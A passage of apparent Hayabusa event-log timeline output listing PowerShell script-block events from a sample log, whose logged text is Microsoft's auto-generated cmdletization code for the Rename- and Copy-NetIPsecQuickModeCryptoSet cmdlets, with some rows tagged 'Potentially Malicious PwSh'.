${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 
'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; 
Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecQuickModeCryptoSet' -Alias '*'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.660 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; 